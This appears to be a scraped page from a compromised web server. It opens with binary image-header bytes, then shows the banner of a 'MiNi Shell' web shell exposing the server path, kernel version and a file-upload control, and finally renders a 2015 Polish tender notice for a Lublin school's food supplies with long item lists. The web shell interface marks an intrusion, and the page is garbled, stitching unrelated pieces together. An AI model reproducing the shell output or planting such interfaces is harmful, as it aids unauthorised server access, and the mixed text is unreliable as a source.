JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150706/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150706/166746-N-2015.html

<p class="kh_header"><b>Lublin: Zakup i dostawa artykułów żywnościowych.</b><br>
<b>Numer ogłoszenia: 166746 - 2015; data zamieszczenia: 06.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Podstawowa nr 28 , ul. Radości 13, 20-530 Lublin, woj. lubelskie, tel. 0-81 5339272, faks 0-81 5339272.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sp28.bip.lublin.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa artykułów żywnościowych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Na przedmiot zamówienia składa się sukcesywny zakup i dostawa artykułów żywnościowych dla potrzeb stołówki Szkoły Podstawowej nr 28 w Lublinie w odniesieniu do 7 części zamówienia zgodnie z załącznikami do ogłoszenia dotyczącymi informacji o ofertach częściowych..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9, 15.22.00.00-6, 15.31.00.00-4, 15.51.00.00-6, 15.80.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zrealizowali w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 dostawy o wartości brutto każdej dostawy nie mniejszej niż wartość brutto oferowana , które zostały wykonane lub są wykonywane należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Informacja Wykonawcy o powierzeniu wykonania części zamówienia podwykonawcy. W odniesieniu do przedmiotu zamówienia Zamawiający za część zamówienia rozumie: sprzedaż artykułów żywnościowych i dostawa (transport). Zamawiający nie zastrzega osobistego wykonania przez wykonawcę części zamówienia, o których mowa w zapisie poprzednim</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Istotne zmiany umowy, ich dopuszczalność oraz warunki zmian : Podane w opisie przedmiotu zamówienia ilości mogą zostać zmniejszone lub zwiększone o określoną wartość procentową tj. : + - 10%. Zmiana cen jednostkowych brutto dostarczanych produktów oparta będzie na klauzuli waloryzacji cen, o ile Wykonawca w sposób obiektywny ekonomicznie na podstawie wniosku oraz przedłożonych dokumentów uzasadni potrzebę ich zmian. Zmiana cen jednostkowych brutto dotyczyła będzie także sezonowości tj. spadku lub wzrostu cen związanej z cyklem wytwarzania produktów.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sp28.bip.lublin.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szkoła Podstawowa nr 28, 20-530 Lublin, ul. Radości 13.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.07.2015 godzina 11:00, miejsce: Szkoła Podstawowa nr 28, 20-530 Lublin, ul. Radości 13, pok. 200.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Produkty zwierzęce, mięso i produkty mięsne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Szponder	kg	100
2.	Wołowina ekstra	kg	600
3.	Polędwiczki wieprzowe	kg	600
4.	Żeberka wieprzowe paski	kg	200
5.	Karczek wieprzowy b/k	kg	750
6.	Łopatka wieprzowa b/k	kg	1000
7.	Schab wieprzowy b/k	kg	750
8.	Wątroba wieprzowa	kg	120
9.	Kiełbasa biała	kg	350
10.	Bok wędzony	kg	300
11.	Parówki cielęce ekstra	kg	30
12.	Kiełbasa Podwawelska	kg	250
13.	Szynka wieprzowa gotowana	kg	10
14.	Mielonka Szynka Tyrolska 	kg	10
15.	Polędwica sopocka	kg	10
16.	Polędwica drobiowa	kg	10
17.	Filety z kurczaka pojedyncze	kg	500
18.	Filety z indyka	kg	600
19.	Udziec z kurczaka	kg	900
20.	Kurczak cały 	kg	100
21.	Podudzie z kurczaka	kg	800
22.	Smalec	kg	100
23.	Słonina	kg	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.10.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Ryby mrożone, filety rybne i pozostałe mięso z ryb Warzywa i owoce mrożone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Filety rybne mrożone miruna bez glazury	kg	1000
2.	Filet z łososia 	kg	70
3.	Filet z pstrąga świeży	kg	180
4.	Konserwa rybna makrela w oleju	szt.	20
5.	Fasola szparagowa żółta mrożona cięta	kg	100
6.	Fasola szparagowa zielona mrożona cięta	kg	300
7.	Mieszanka kompotowa mrożona	kg	300
8.	Kalafior mrożony polski	kg	200
9.	Truskawka mrożona polska	kg	300
10.	Brokuł mrożony	kg	200
11.	Wiśnie drelowane mrożone	kg	100
12.	Maliny mrożone	kg	100
13.	Marchew liliput mrożona 	kg	180
14.	Szpinak w kostkach siekany	kg	150
15.	Groszek zielony mrożony	kg	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.22.00.00-6, 15.31.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Ziemniaki, warzywa, owoce świeże i przetworzone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Ziemniaki jadalne polskie workowane a 30kg	kg	25 000
2.	Kapusta kwaszona	kg	1000
3.	Ogórek kiszony	kg	500
4.	Burak czerwony długi	kg	800
5.	Cebula czerwona	kg	50
6.	Cebula biała polska	kg	1500
6.	Czosnek główka polski	szt.	400
7.	Marchew korzeń polska	kg	2500
8.	Ogórek świeży	kg	600
9.	Pietruszka korzeń polska	kg	900
10.	Rzodkiewka  pęczek min. 200g	pęczek	150
11.	Rzepa biała	kg	300
12.	Seler bulwa	kg	300
13.	Fasola Jaś duży	kg	500
14.	Fasola Jaś drobny	kg	100
15.	Groch łupany	kg	50
16.	Papryka świeża	kg	400
17.	Pomidor świeży	kg	500
18.	Brokuły	szt.	300
19.	Botwinka min 350g	pęczek	60
20.	Kapusta pekińska	kg	500
21.	Kapusta czerwona	kg	200
22.	Kalafior świeży  	szt.	300
23.	Kapusta biała 	kg	400
24.	Kapusta młoda polska	szt.	400
25.	Koper pęczek min. 100g	pęczek	700
26.	Natka pietruszki pęczek min. 100g	pęczek	1000
27.	Por	kg	200
28.	Szczaw	kg	50
29.	Szczypior pęczek min 150g	pęczek	700
30.	Sałata masłowa główka min 450g	szt.	1300
31.	Pieczarka świeża	kg	300
32.	Fasola szparagowa żółta świeża	kg	100
33.	Fasola szparagowa zielona świeża	kg	100
34.	Banany	kg	5000
35.	Gruszki polskie	kg	1500
36.	Jabłka polskie	kg	3000
37.	Maliny polskie	kg	200
38.	Mandarynki	kg	500
39.	Morele	kg	120
40.	Nektarynki	kg	500
41.	Pomarańcze	kg	5000
42.	Śliwka węgierka	kg	300
43.	Truskawka świeża polska	kg	150
44.	Brzoskwinie	kg	400
45.	Ziemniak młody jadalny polski	kg	2000
46.	Kiwi	kg	400
47.	Marchew młoda jadalna polska	pęczek	200
48.	Pietruszka młoda jadalna polska	pęczek	100
49.	Sałata rzymska min 400g	szt	200
50.	Seler naciowy min 250g	pęczek	100
51.	Soczewica czerwona łupana	kg	100
52.	Brukselka	kg	200
53.	Cebula cukrowa	kg	200
54.	Sałata mix w workach min 600g	szt.	200
55.	Sałata rukola	szt.	200
56.	Botwinka min 500g	pęczek	100
57.	Bazylia świeża zioło doniczka	szt	50
58.	Rozmaryn świeży zioło doniczka	szt	50
59.	Oregano świeże zioło doniczka	szt	50
60.	Tymianek świeży zioło doniczka	szt	50
61.	Lubczyk świeży zioło doniczka	szt	50
62.	Sałata lodowa	szt.	200
63.	Kapusta włoska	kg	100
64.	Borowik suszony 	kg	2
65.	Paragwajka owoc	kg	500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.31.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Mleko, śmietana, nabiał.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Mleko 3,2 %  butelka plastikowa	szt.	4000
2.	Śmietana 18% wiaderko 1l	szt.	2000
3.	Serek topiony min. 100g różne smaki	szt.	300
4.	Śmietana 30% słodka opakowanie 200 g	szt.	5000
5.	Masło kostka 200g min. 82% tłuszczu	szt.	1300
6.	Ser twarogowy półtłusty kostka 	kg	350
7.	Ser żółty twardy Gouda	kg	100
8.	Serek homogenizowany 150 g różne smaki	szt.	3000
9.	Jogurt naturalny grecki opak. 400 ml	szt.	100
10.	Jogurt owocowy opak  150 ml różne smaki	szt.	6000
11.	Jogurt owocowy pitny min. 350 g butelka różne smaki	szt.	5000
12.	Jogurt naturalny 150ml Krasnystaw	szt.	5000
13.	Ser feta sałatkowy min. 250 g	szt.	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.51.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Wyroby mączne garmażeryjne do gotowania i smażenia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Kopytka świeże	kg	1500
2.	Kluski śląskie świeże	kg	700
3.	Pierogi wiejskie świeże	kg	800
4.	Pierogi z kapustą i pieczarkami	kg	400
5.	Pierogi z mięsem	kg	500
6.	Pierogi ruskie	kg	1300
7.	Naleśniki z serem	kg	1300
8.	Kluski leniwe świeże	kg	1000
9.	Pyzy ziemniaczane	kg	600
10.	Pyzy z mięsem	kg	800.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.51.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Różne produkty spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Cukier a 1kg	szt.	1400
2.	Cukier waniliowy 32g	szt.	100
3.	Miód naturalny słoik 300g polski	szt.	10
4.	Kakao rozpuszczalne 300g Puchatek	szt.	5
5.	Czekolada 200g	szt.	1400
6.	Cukierki czekoladowe Mieszanka Solidarność	kg	70
7.	Draże orzechowe 100g	szt.	700
8.	Herbata granulowana Lipton 100g	szt.	5
9.	Ocet spirytusowy 10% a 0,5l	szt.	10
10.	Musztarda rosyjska a 200g	szt.	40
11.	Sos sałatkowo-koperkowy proszek a0,8 	szt.	20
12.	Sos grecki proszek a 0,8 	szt.	20
13.	Sos boloński proszek a 0,8 	szt.	20
14.	Sos grzybowy proszek a 0,8 	szt.	20
15.	Majonez a 3kg	szt.	20
16.	Przyprawa chińszczyzny a 1kg	szt.	6
17.	Papryka słodka 800g	szt.	15
18.	Papryka ostra 800g	szt.	10
19.	Pieprz ziołowy 700g	szt.	10
20.	Przyprawa do zup Maggi 960g	szt.	100
21.	Sól kuchenna a 1kg	szt.	300
22.	Ziele angielskie 600g	szt.	20
23.	Zioła prowansalskie 300g	szt.	4
24.	Pieprz naturalny 800g	szt.	25
25.	Majeranek tarty 150g	szt.	30
26.	Liść laurowy 100g	szt.	50
27.	Kminek 550g	szt.	10
28.	Kwasek cytrynowy a 1,3kg	szt.	20
29.	Vegeta 200g	szt.	400
30.	Barszcz czerwony koncentrat a1,4kg	szt.	30
31.	Rosół z kury w proszku 0,9kg	szt.	20
32.	Czosnek granulowany a 1kg	szt.	30
33.	Lubczyk zioło suszone a 1kg	szt.	15
34.	Czomber zioło suszone a 1kg	szt.	15
35.	Tymianek zioło suszone a 1kg	szt.	15
36.	Estragon zioło suszone a 1kg	szt.	15
37.	Bazylia zioło suszone a 1kg	szt.	15
38.	Czubryca zielona zioło suszone a 1kg	szt.	15
39.	Pulpa pomidorowa a 1kg	szt.	10
40.	Kurkuma a 1kg	szt.	10
41.	Carry a 1kg	szt.	10
42.	Keczup 500g Pudliszki	szt.	10
43.	Chrzan słoik 370ml Rebok	szt.	150
44.	Gałka muszkatołowa mielona a1kg	szt.	5
45.	Kozieratka zioło suszone a1kg	szt.	15
46.	Ocet winny a 0,5l	szt.	10
47.	Ocet balsamiczny a0,5l	szt.	10
48.	Fasola czerwona konserwowa a320g	szt.	100
49.	Cebula suszona a 1kg	szt.	15
50.	Galaretka owocowa w proszku 1,3kg Winiary	szt.	100
51.	Dżem truskawkowy 280g	szt.	20
52.	Olej rzepakowy 0,9l	szt.	1100
53.	Marynata do drobiu 700g	szt.	10
54.	Brzoskwinie w syropie 450g	szt.	150
55.	Ananas w syropie 450g	szt.	150
56.	Syropy owocowe bez konserwantów 430ml	szt.	1000
57.	Sok warzywno-owocowy Kubuś Play 	szt.	4000
58.	Soki owocowe w kartonie 200ml	szt.	2000
59.	Sok owocowy Kubuś Play bez konserwantów	szt.	4000
60.	Ryż długoziarnisty biały a1kg	kg	150
61.	Ryż paraboliczny a5kg	kg	300
62.	Ryż paraboliczny brązowy a1kg	kg	120
